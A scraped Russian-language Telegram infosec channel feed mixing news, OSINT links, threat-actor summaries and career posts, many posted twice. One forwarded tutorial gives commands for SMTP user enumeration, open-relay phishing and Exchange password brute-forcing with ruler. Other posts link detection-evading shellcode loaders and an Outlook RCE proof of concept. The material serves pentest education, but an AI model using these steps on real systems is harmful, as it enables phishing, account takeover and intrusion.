#osint
🥝 OSINT от а до я
Большая коллекция материалов для тех, кто желает развивать свои навыки поиска по открытым источникам.
Репозиторий содержит советы, с чего начать, практические кейсы и тренировочные площадки.
Большая коллекция материалов для тех, кто желает развивать свои навыки поиска по открытым источникам.
Репозиторий содержит советы, с чего начать, практические кейсы и тренировочные площадки.
Please open Telegram to view this post
VIEW IN TELEGRAM
GitHub
GitHub - OffcierCia/non-typical-OSINT-guide: The most unusual OSINT guide you've ever seen. The repository is intended for bored…
The most unusual OSINT guide you've ever seen. The repository is intended for bored professionals only. PRs are welcome! - GitHub - OffcierCia/non-typical-OSINT-guide: The most unusual OSI...
❤🔥4🆒4 4
Please open Telegram to view this post
VIEW IN TELEGRAM
GitHub
GitHub - EvilBytecode/Shellcode-Loader: This is way to load a shellcode, and obfuscate it, so it avoids scantime detection.
This is way to load a shellcode, and obfuscate it, so it avoids scantime detection. - EvilBytecode/Shellcode-Loader
#realcase #soc
📱 От стажера до CISO в крупной компании за шесть лет: что нужно знать и уметь молодому руководителю
О нюансах работы CISO действительно существует большое количество мнений и споров.
Каждый руководитель действительно уникален по своему и в данный доклад отражает особенность этой должности как элемента топ- менеджмента компании.
Какие качества необходимы, технические навыки, подход к работе и смежные с этим всем вопросы Вы узнаете в следующем докладе.
🌟 Приятного просмотра
О нюансах работы CISO действительно существует большое количество мнений и споров.
Каждый руководитель действительно уникален по своему и в данный доклад отражает особенность этой должности как элемента топ- менеджмента компании.
Какие качества необходимы, технические навыки, подход к работе и смежные с этим всем вопросы Вы узнаете в следующем докладе.
Please open Telegram to view this post
VIEW IN TELEGRAM
YouTube
От стажера до CISO в крупной компании за шесть лет: что нужно знать и уметь молодому руководителю
Какие знания и умения должны быть у руководителя отдела ИБ? Что делать в первые месяцы в новой роли? Как соответствовать ожиданиям менеджмента? Ответами на эти и другие вопросы спикер поделится в презентации.
Владислав Иванов
H&N (ранее Danone)
Владислав Иванов
H&N (ранее Danone)
#itnews #infosec
⚡️ Мошенническая кампания нацелена на россиян, собирающихся посетить олимпийские игры
Широкая сеть из 708 мошеннических веб-доменов используется для продажи поддельных билетов на спортивные и музыкальные мероприятия, в первую очередь русскоязычной аудитории, по данным провайдера QuoIntelligence, занимающегося анализом угроз.
На двух из этих доменов, "ticket-paris24 [.]com" и "tickets-paris24 [.] com", размещены убедительные веб-сайты, которые, по-видимому, позволяют пользователям приобретать билеты на предпочитаемые ими мероприятия во время предстоящих летних Олимпийских игр и выбирать жилье в Париже.
📲 Телеграм-боты доставляют пользователям СМС-стилеры для перехвата кодов 2FA
Специалисты Positive Technologies предупреждают об активности киберпреступников, использующих Telegram в качестве командного центра (C2). В частности, исследователи выявили в мессенджере более тысячи ботов, использующих СМС-стилеры для перехвата кодов аутентификации. Как отмечают в Positive Technologies, телеграм-боты имеют индонезийское происхождение. Статистика по регионам, в которых вредонос был загружен на устройство, говорит о том, что атакующие охотятся в том числе на жителей России и Белоруссии.
Как правило, жертва получает сообщение с вложенным файлом APK. Не обращая внимания на расширение, пользователь скачивает этот файл, в результате чего на его мобильное устройство устанавливается СМС-стилер. Задача
последнего — перехватывать коды аутентификации, которые откроют злоумышленникам доступ к банковскому аккаунту жертвы.
Пока в России и Белоруссии встречались только единичные случаи заражения, а основная масса пришлась на жителей Индонезии.
🏋️ Разработчики Signal после критики усилят безопасность настольного клиента и изменят способ хранения ключей шифрования
Разработчики Signal после критики со стороны профильных экспертов и пользователей согласились усилить безопасность настольного клиента мессенджера и изменить способ хранения ключей шифрования. В настоящее время Signal хранит ключи шифрования на ПК в виде обычного текста (plaintext), что потенциально подвергает пользователей риску кражи данных в случае компрометации системы.
«Помимо перехода к зашифрованным/поддерживаемым хранилищем ключей ключам шифрования локальной базы данных на поддерживаемых платформах, наша новая реализация защиты также включает в себя некоторые дополнительные
шаги по устранению неполадок и временный запасной вариант, который позволит пользователям восстановить свою базу данных сообщений, используя свой устаревший ключ шифрования базы данных, если что-то пойдет не так», — объяснил СМИ разработчик Signal Джейми Кайл.
Широкая сеть из 708 мошеннических веб-доменов используется для продажи поддельных билетов на спортивные и музыкальные мероприятия, в первую очередь русскоязычной аудитории, по данным провайдера QuoIntelligence, занимающегося анализом угроз.
На двух из этих доменов, "ticket-paris24 [.]com" и "tickets-paris24 [.] com", размещены убедительные веб-сайты, которые, по-видимому, позволяют пользователям приобретать билеты на предпочитаемые ими мероприятия во время предстоящих летних Олимпийских игр и выбирать жилье в Париже.
Специалисты Positive Technologies предупреждают об активности киберпреступников, использующих Telegram в качестве командного центра (C2). В частности, исследователи выявили в мессенджере более тысячи ботов, использующих СМС-стилеры для перехвата кодов аутентификации. Как отмечают в Positive Technologies, телеграм-боты имеют индонезийское происхождение. Статистика по регионам, в которых вредонос был загружен на устройство, говорит о том, что атакующие охотятся в том числе на жителей России и Белоруссии.
Как правило, жертва получает сообщение с вложенным файлом APK. Не обращая внимания на расширение, пользователь скачивает этот файл, в результате чего на его мобильное устройство устанавливается СМС-стилер. Задача
последнего — перехватывать коды аутентификации, которые откроют злоумышленникам доступ к банковскому аккаунту жертвы.
Пока в России и Белоруссии встречались только единичные случаи заражения, а основная масса пришлась на жителей Индонезии.
Разработчики Signal после критики со стороны профильных экспертов и пользователей согласились усилить безопасность настольного клиента мессенджера и изменить способ хранения ключей шифрования. В настоящее время Signal хранит ключи шифрования на ПК в виде обычного текста (plaintext), что потенциально подвергает пользователей риску кражи данных в случае компрометации системы.
«Помимо перехода к зашифрованным/поддерживаемым хранилищем ключей ключам шифрования локальной базы данных на поддерживаемых платформах, наша новая реализация защиты также включает в себя некоторые дополнительные
шаги по устранению неполадок и временный запасной вариант, который позволит пользователям восстановить свою базу данных сообщений, используя свой устаревший ключ шифрования базы данных, если что-то пойдет не так», — объяснил СМИ разработчик Signal Джейми Кайл.
Please open Telegram to view this post
VIEW IN TELEGRAM
CSA_PRC_MSS_TRADECRAFT_IN_ACTION.PDF
2.9 MB
#soc
🪆 APT 40
APT 40 действует по крайней мере с 2011 года, в первую очередь нацеленная на правительственные организации и ключевые частные предприятия в США и Австралии. Они быстро используют новые публично раскрытые уязвимости и развертывают веб-оболочки для обеспечения доступа. Их атаки включают сетевую разведку, использование уязвимостей, подобных тем, что есть в Log4J, и кражу данных через серверы управления и контроля (C2).
В следующем файле представлены основные техники и тактики этой группировки.
APT 40 действует по крайней мере с 2011 года, в первую очередь нацеленная на правительственные организации и ключевые частные предприятия в США и Австралии. Они быстро используют новые публично раскрытые уязвимости и развертывают веб-оболочки для обеспечения доступа. Их атаки включают сетевую разведку, использование уязвимостей, подобных тем, что есть в Log4J, и кражу данных через серверы управления и контроля (C2).
В следующем файле представлены основные техники и тактики этой группировки.
Please open Telegram to view this post
VIEW IN TELEGRAM
❤🔥5 5 4
Latest_SOC_Analyst_L1_Interview_Questions__1719796381-1.pdf
220.8 KB
#soc #beginners
👋 Интервью SOC L1
Путь специалиста по информационной безопасности насыщен и разнообразен.
🔵 В приведённом файле обозначены вопросы с интервью на позиции аналитика.
Успехов в начинаниях👍
Путь специалиста по информационной безопасности насыщен и разнообразен.
Успехов в начинаниях
Please open Telegram to view this post
VIEW IN TELEGRAM
#byapsecurity
🌟 Мнение пентестера AP Security об обучении на отечественных курсах.
Вот и подошёл к концу увлекательный путь прохождения курса «Анализ защищенности инфраструктуры на основе технологий Active Directory» от RalfHacker (Автор известной книги "Active Directory глазами хакера") и Павла Никитина. Мы учились первым потоком и отработали всё на твёрдую пятёрку.
В нашей компании есть хорошая практика регулярно повышать свою квалификацию, а в связи с уходом многих зарубежных сертификаций с рынка отличной возможностью стало попробовать отечественные наработки. К тому же я давно пытался освоить тему внутреннего пентеста прочтениями разных циклов статей, например от zer1to , прохождением лабораторных по типу GOAD. Но это большого успеха не приносило, это всё не структурировано, нет отработки большинства тем на практике, нет передачи накопленного опыта на реальных практических кейсах и учениях.
Реальное понимание и подход к похеку внутрянки я приобрёл за эти 3 месяца. После прохождения курса у меня появилась отличная база заметок по каждой тактике и технике, применяемой на пентесте, не удивительно, к каждому уроку были подготовлены методички ( примерно 30 страниц на каждом уроке ), видео прохождения лабораторной на отработку всех техник и Домашнее задание, на решение которого уходило 2-3 вечера после работы. К тому же появилась целая заметка тем, которые дополнительно стоит изучить, так сказать down the rabbit hole. Я справлялся почти всегда в сроки, в общей сложности я сделал 16 домашних заданий и сдал экзамен без больших трудностей, учитывая, что раньше я только несколько работал с атаками на домен во время пентестов, в основном я ломал веб, занимался разработкой и был уверенным игроком в ctf.
Крутым моментом стало освещение огромного количества утилит под различные платформы, теперь я точно не растеряюсь, если мне нужно будет релеить хеши на виндовом хосте. Огромное количество методов повышения привилегий , сбора УД, закрепления, туннелирование, обходов UAC, AMSI, ретрансляционные атаки, атаки на доверительные отношения, службы сертификации, делегирование, работа с C2 и это не весь список тем с которыми вам придётся столкнуться.
Подводя итог, хочется сказать только одно - огромное спасибо Мише и Паше за Лучший курс по внутрянке в стране, а может быть и в мире(кто знает..)
Вот и подошёл к концу увлекательный путь прохождения курса «Анализ защищенности инфраструктуры на основе технологий Active Directory» от RalfHacker (Автор известной книги "Active Directory глазами хакера") и Павла Никитина. Мы учились первым потоком и отработали всё на твёрдую пятёрку.
В нашей компании есть хорошая практика регулярно повышать свою квалификацию, а в связи с уходом многих зарубежных сертификаций с рынка отличной возможностью стало попробовать отечественные наработки. К тому же я давно пытался освоить тему внутреннего пентеста прочтениями разных циклов статей, например от zer1to , прохождением лабораторных по типу GOAD. Но это большого успеха не приносило, это всё не структурировано, нет отработки большинства тем на практике, нет передачи накопленного опыта на реальных практических кейсах и учениях.
Реальное понимание и подход к похеку внутрянки я приобрёл за эти 3 месяца. После прохождения курса у меня появилась отличная база заметок по каждой тактике и технике, применяемой на пентесте, не удивительно, к каждому уроку были подготовлены методички ( примерно 30 страниц на каждом уроке ), видео прохождения лабораторной на отработку всех техник и Домашнее задание, на решение которого уходило 2-3 вечера после работы. К тому же появилась целая заметка тем, которые дополнительно стоит изучить, так сказать down the rabbit hole. Я справлялся почти всегда в сроки, в общей сложности я сделал 16 домашних заданий и сдал экзамен без больших трудностей, учитывая, что раньше я только несколько работал с атаками на домен во время пентестов, в основном я ломал веб, занимался разработкой и был уверенным игроком в ctf.
Крутым моментом стало освещение огромного количества утилит под различные платформы, теперь я точно не растеряюсь, если мне нужно будет релеить хеши на виндовом хосте. Огромное количество методов повышения привилегий , сбора УД, закрепления, туннелирование, обходов UAC, AMSI, ретрансляционные атаки, атаки на доверительные отношения, службы сертификации, делегирование, работа с C2 и это не весь список тем с которыми вам придётся столкнуться.
Подводя итог, хочется сказать только одно - огромное спасибо Мише и Паше за Лучший курс по внутрянке в стране, а может быть и в мире(кто знает..)
Please open Telegram to view this post
VIEW IN TELEGRAM
Telegram
Ralf Hacker Channel
Пул тегов:
https://t.iss.one/RalfHackerChannel/297
Админ: @hackerralf8
https://t.iss.one/RalfHackerChannel/297
Админ: @hackerralf8
❤🔥11 9 8👏2😴2
#byapsecurity
🔥 Наверняка уже не раз Вы встречались с работами нашего исследователя безопасности.
AFANX, автор статей на Хакер "Беззащитная защита. Изучаем уязвимость, дающую встроить бэкдор в FortiGate", "Гид по реверсу.Тренируемся анализировать бинарные файлы на примере libexif" и далеко не только этих работ, по истине энтузиаст и специалист своего дела завёл свой канал-блог, где делится отличительной атмосферой и собственными работами.
📲 Подписывайтесь на канал и прокачивайте свои навыки в области реверса и pwn.💡
AFANX, автор статей на Хакер "Беззащитная защита. Изучаем уязвимость, дающую встроить бэкдор в FortiGate", "Гид по реверсу.Тренируемся анализировать бинарные файлы на примере libexif" и далеко не только этих работ, по истине энтузиаст и специалист своего дела завёл свой канал-блог, где делится отличительной атмосферой и собственными работами.
Please open Telegram to view this post
VIEW IN TELEGRAM
Forwarded from Machete Hack
Атакуем корпоративную почту ☄️
Часто при пентесте возникает ситуация, когда при скане портов можно наткнуться на открытый 25 порт, на котором висит SMTP сервер, но что же можно с этим поделать?
Самым первым действием можно попробовать просто подключиться к самому серверу
В данном случае уже можно получить баннер SMTP сервера и поискать готовые сплойты
Бывали случаи, когда SMTP сервер не требовал аутентификации и позволял отправлять почтовые письма от любого юзера другому любому юзеру, что будет отличным началом для последующего фишинга. Но что делать, если на этапе разведки нам не удалось получить достаточное количество корпоративных емэйлов сотрудников?
Тут нам поможет user enumeration(брут учеток), который можно сделать через готовую утилиту smtp-user-enum, написанную на питоне
Утилита имеет несколько режимов, которые используются при неудачной отработке других
VRFY mode(default)
EXPN mode
RCPT mode
Также существует готовый модуль в metasploit для перебора пользователей на smtp сервере
После того как мы нашли валидные мэйлы уже можно отправлять сообщения
В контексте темы поста рассмотрим ситуацию, когда мы натыкаемся на Microsoft Exchange Server, а именно на Outlook Web Access, веб-интерфейс, предоставляющий пользователю возможность отправлять сообщения, добавлять контакты, вести календарь и планы.
Для поиска эксплойтов можно узнать версию OWA следующим скриптом
В отстутствии списка валидных почт, можно воспользоваться Time Based брутфорсом, который иногда срабатывает. Для этого запустим Intruder в Burp Suite, подготовим словарь и начнем перебирать пользователей. После выполнения Sniper атаки(Режим работы Intruder) отфильтруем запросы по времени и увидим, что у валидных пользователей время обработки запроса будет в разы больше.
Можно воспользоваться одними из самых популярных CVE для OWA
ProxyLogon
ProxyShell
Для уже найденных пользователей можно сбрутить пароль также через Intruder, либо через инструмент ruler
После успешной аутентификации можно не только отправлять письма, либо читать переписки, но и собрать весьма полезную информацию из календаря, либо cписок контаков GAL(Global Address List)
Для автоматизации сбора глобального списка адресов можем опять использовать ruler
Часто при пентесте возникает ситуация, когда при скане портов можно наткнуться на открытый 25 порт, на котором висит SMTP сервер, но что же можно с этим поделать?
Самым первым действием можно попробовать просто подключиться к самому серверу
nc -vn ip 25
В данном случае уже можно получить баннер SMTP сервера и поискать готовые сплойты
Бывали случаи, когда SMTP сервер не требовал аутентификации и позволял отправлять почтовые письма от любого юзера другому любому юзеру, что будет отличным началом для последующего фишинга. Но что делать, если на этапе разведки нам не удалось получить достаточное количество корпоративных емэйлов сотрудников?
Тут нам поможет user enumeration(брут учеток), который можно сделать через готовую утилиту smtp-user-enum, написанную на питоне
pip install smtp-user-enum
Утилита имеет несколько режимов, которые используются при неудачной отработке других
VRFY mode(default)
smtp-user-enum -U /usr/share/wordlists/users.txt mail.example.tld 25
EXPN mode
smtp-user-enum -m EXPN -U /usr/share/wordlists/users.txt mail.example.tld 25
RCPT mode
smtp-user-enum -m RCPT -U /usr/share/wordlists/users.txt mail.example.tld 25
Также существует готовый модуль в metasploit для перебора пользователей на smtp сервере
msf > use auxiliary/scanner/smtp/smtp_enum
msf auxiliary(smtp_enum) set RHOSTS <IP address/target>
msf auxiliary(smtp_enum) > set rport 25
msf auxiliary(smtp_enum) set USER_FILE <address of file>
msf auxiliary(smtp_enum) run
После того как мы нашли валидные мэйлы уже можно отправлять сообщения
MAIL FROM: [email protected]
250 ok
RCPT TO: [email protected]
250 ok
data
354 End data with <CR><LF>.<CR><LF>
SUBJECT: Тема письма
фишинговый текст
. (ставится с новой строки, чтобы закончить текст письма)
250 ok
В контексте темы поста рассмотрим ситуацию, когда мы натыкаемся на Microsoft Exchange Server, а именно на Outlook Web Access, веб-интерфейс, предоставляющий пользователю возможность отправлять сообщения, добавлять контакты, вести календарь и планы.
Для поиска эксплойтов можно узнать версию OWA следующим скриптом
sudo python3 get_exchange_version.py https://mail.target.com
В отстутствии списка валидных почт, можно воспользоваться Time Based брутфорсом, который иногда срабатывает. Для этого запустим Intruder в Burp Suite, подготовим словарь и начнем перебирать пользователей. После выполнения Sniper атаки(Режим работы Intruder) отфильтруем запросы по времени и увидим, что у валидных пользователей время обработки запроса будет в разы больше.
Можно воспользоваться одними из самых популярных CVE для OWA
ProxyLogon
ProxyShell
Для уже найденных пользователей можно сбрутить пароль также через Intruder, либо через инструмент ruler
wget https://github.com/sensepost/ruler/releases/download/2.4.1/ruler-linux64
chmod +x ruler-linux64
./ruler-linux64 --domain domain.com brute --users usernames.txt --passwords passwords.txt
После успешной аутентификации можно не только отправлять письма, либо читать переписки, но и собрать весьма полезную информацию из календаря, либо cписок контаков GAL(Global Address List)
Для автоматизации сбора глобального списка адресов можем опять использовать ruler
./ruler-linux64 --email [email protected] abk dump --output /tmp/gal.txt
Please open Telegram to view this post
VIEW IN TELEGRAM
#pentest
📱 System32 для выполнения атак.
Каталог System32 - это критический компонент операционной системы Windows, в котором хранятся важные системные файлы и библиотеки, необходимые для работы системы.
В контексте наступательной безопасности этот каталог имеет большое значение, поскольку содержит исполняемые файлы и сценарии, которые можно использовать как для администрирования системы, так и для вредоносных целей.
Приятного прочтения👌
Каталог System32 - это критический компонент операционной системы Windows, в котором хранятся важные системные файлы и библиотеки, необходимые для работы системы.
В контексте наступательной безопасности этот каталог имеет большое значение, поскольку содержит исполняемые файлы и сценарии, которые можно использовать как для администрирования системы, так и для вредоносных целей.
Приятного прочтения
Please open Telegram to view this post
VIEW IN TELEGRAM
ExpiredDomains.com
$domainname is for sale! Check it out on ExpiredDomains.com
redteamrecipe.com is available for sale! Check it out on ExpiredDomains.com. redteamrecipe.com is in high demand, secure it today!
#soc
✏️ VasyGrek and Mr.Burns
Как выяснили в F.A.C.C.T., атакующая российские компании группировка VasyGrek активна как минимум с 2016 года. В погоне за бизнес-аккаунтами ДБО злоумышленники используют коммерческих инфостилеров и RAT, в том числе творения вирусописателя Mr.Burns.
Эксперты F.A.C.C.T проанализировали инструменты и связи киберпреступников, атакующих российских бухгалтеров.
Приятного прочтения👁
Как выяснили в F.A.C.C.T., атакующая российские компании группировка VasyGrek активна как минимум с 2016 года. В погоне за бизнес-аккаунтами ДБО злоумышленники используют коммерческих инфостилеров и RAT, в том числе творения вирусописателя Mr.Burns.
Эксперты F.A.C.C.T проанализировали инструменты и связи киберпреступников, атакующих российских бухгалтеров.
Приятного прочтения
Please open Telegram to view this post
VIEW IN TELEGRAM
#tools #redteam
🎨 ProtectMyTooling
Скрипт, который объединяет множество упаковщиков, обфускаторов, загрузчиков шеллкода, кодировщиков для создания сложных защищенных имплантатов Red Team. Ваш идеальный компаньон в CI/CD конвейере разработки ПО, помогающий ставить водяные знаки на ваши артефакты, собирать IOC и многое другое.
Скрипт, который объединяет множество упаковщиков, обфускаторов, загрузчиков шеллкода, кодировщиков для создания сложных защищенных имплантатов Red Team. Ваш идеальный компаньон в CI/CD конвейере разработки ПО, помогающий ставить водяные знаки на ваши артефакты, собирать IOC и многое другое.
Please open Telegram to view this post
VIEW IN TELEGRAM
GitHub
GitHub - mgeeky/ProtectMyTooling: Multi-Packer wrapper letting us daisy-chain various packers, obfuscators and other Red Team oriented…
Multi-Packer wrapper letting us daisy-chain various packers, obfuscators and other Red Team oriented weaponry. Featured with artifacts watermarking, IOCs collection & PE Backdooring. You fe...
#realcase
🖥 Что должно измениться, чтобы утечек стало меньше
Ассоциация больших данных (ее членами являются «Яндекс», VK, Сбербанк, Газпромбанк, Тинькофф Банк, Россельхозбанк, «Мегафон», «Ростелеком», Qiwi, билайн, МТС, фонд «Сколково», Аналитический центр при правительстве Российской Федерации, ВТБ, Avito, Центр стратегических разработок) предложила депутатам уточнить текст поправок в Уголовный кодекс, ужесточающих наказание за утечки данных и устанавливающих для нарушителей даже уголовную ответственность за сбор или хранение незаконно полученных персональных данных. Об этом говорится в письме ассоциации от 26 декабря 2023 года в комитет Госдумы по госстроительству и законодательству.
🔩 Данная дискуссия широко описывает проблемы регулирования ответственности за утечки персональных данных, от рисков для бизнеса до юридических ограничений. Обсуждается предложенный АБД стандарт в области защиты персональных данных, опробованный крупными игроками рынка.
Приятного просмотра🌟
Ассоциация больших данных (ее членами являются «Яндекс», VK, Сбербанк, Газпромбанк, Тинькофф Банк, Россельхозбанк, «Мегафон», «Ростелеком», Qiwi, билайн, МТС, фонд «Сколково», Аналитический центр при правительстве Российской Федерации, ВТБ, Avito, Центр стратегических разработок) предложила депутатам уточнить текст поправок в Уголовный кодекс, ужесточающих наказание за утечки данных и устанавливающих для нарушителей даже уголовную ответственность за сбор или хранение незаконно полученных персональных данных. Об этом говорится в письме ассоциации от 26 декабря 2023 года в комитет Госдумы по госстроительству и законодательству.
Приятного просмотра
Please open Telegram to view this post
VIEW IN TELEGRAM
YouTube
Что должно измениться, чтобы утечек стало меньше
#byapsecurity
🐦 Студенческий опыт Standoff — на шаг ближе к вершинам 🥇
Привет!!! Не так давно стажёры лаборатории инновационных технологий и кибербезопасности нашей компании принимали участие во Всероссийской студенческой кибербитве. Изюминкой тех соревнований являлся полигон Standoff, предоставленный студентам для получения первичных навыков участия в этих захватывающих кибербитвах.
⚡️ 8-10 сентября эти захватывающие соревнования пройдут вновь. Вся информация представлена по ссылке.
Надеемся, что печатный труд ребят ( за что им отдельная благодарность) поможет Вам раскрыть потенциал и реализовать свои цели - принять участие в сражениях Государства F в роли атакующих или защитников🔥
Приятного прочтения✈️
Привет!!! Не так давно стажёры лаборатории инновационных технологий и кибербезопасности нашей компании принимали участие во Всероссийской студенческой кибербитве. Изюминкой тех соревнований являлся полигон Standoff, предоставленный студентам для получения первичных навыков участия в этих захватывающих кибербитвах.
Надеемся, что печатный труд ребят ( за что им отдельная благодарность) поможет Вам раскрыть потенциал и реализовать свои цели - принять участие в сражениях Государства F в роли атакующих или защитников
Приятного прочтения
Please open Telegram to view this post
VIEW IN TELEGRAM
Хабр
Студенческий опыт Standoff — на шаг ближе к вершинам
Привет, Хабр! На связи лаборатория кибербезопасности AP Security и сегодня наши стажёры делятся своим важным профессиональным опытом. Каждый, кто хотя бы немного знаком со сферой ИБ или краем уха...
Please open Telegram to view this post
VIEW IN TELEGRAM
GitHub
GitHub - jivoi/awesome-osint: :scream: A curated list of amazingly awesome OSINT
:scream: A curated list of amazingly awesome OSINT - jivoi/awesome-osint
#pentest
📱 PoC Microsoft Outlook Remote Code Execution CVE-2024-21413
13 февраля 2024 года компания Microsoft выпустила предупреждение для своих пользователей о критической уязвимости в пакете Office, которая позволяет злоумышленникам удаленно выполнять вредоносный код.
Уязвимость затрагивает несколько продуктов Microsoft Office, включая приложения 365 Enterprise, Office 2016 и 2019, а также Office LTSC 2021.
➡️ PoC на данную уязвимость: https://blog.injectexp.dev/outlook-cve-2024-21413-for-rce-hacking-through-a-letter/07/rce/
В строке 27 необходимо указать путь к файлу на вашем сервере. В описании к скрипту имеются комментарии.
Об уязвимости: https://habr.com/ru/articles/798759/
13 февраля 2024 года компания Microsoft выпустила предупреждение для своих пользователей о критической уязвимости в пакете Office, которая позволяет злоумышленникам удаленно выполнять вредоносный код.
Уязвимость затрагивает несколько продуктов Microsoft Office, включая приложения 365 Enterprise, Office 2016 и 2019, а также Office LTSC 2021.
В строке 27 необходимо указать путь к файлу на вашем сервере. В описании к скрипту имеются комментарии.
Об уязвимости: https://habr.com/ru/articles/798759/
Please open Telegram to view this post
VIEW IN TELEGRAM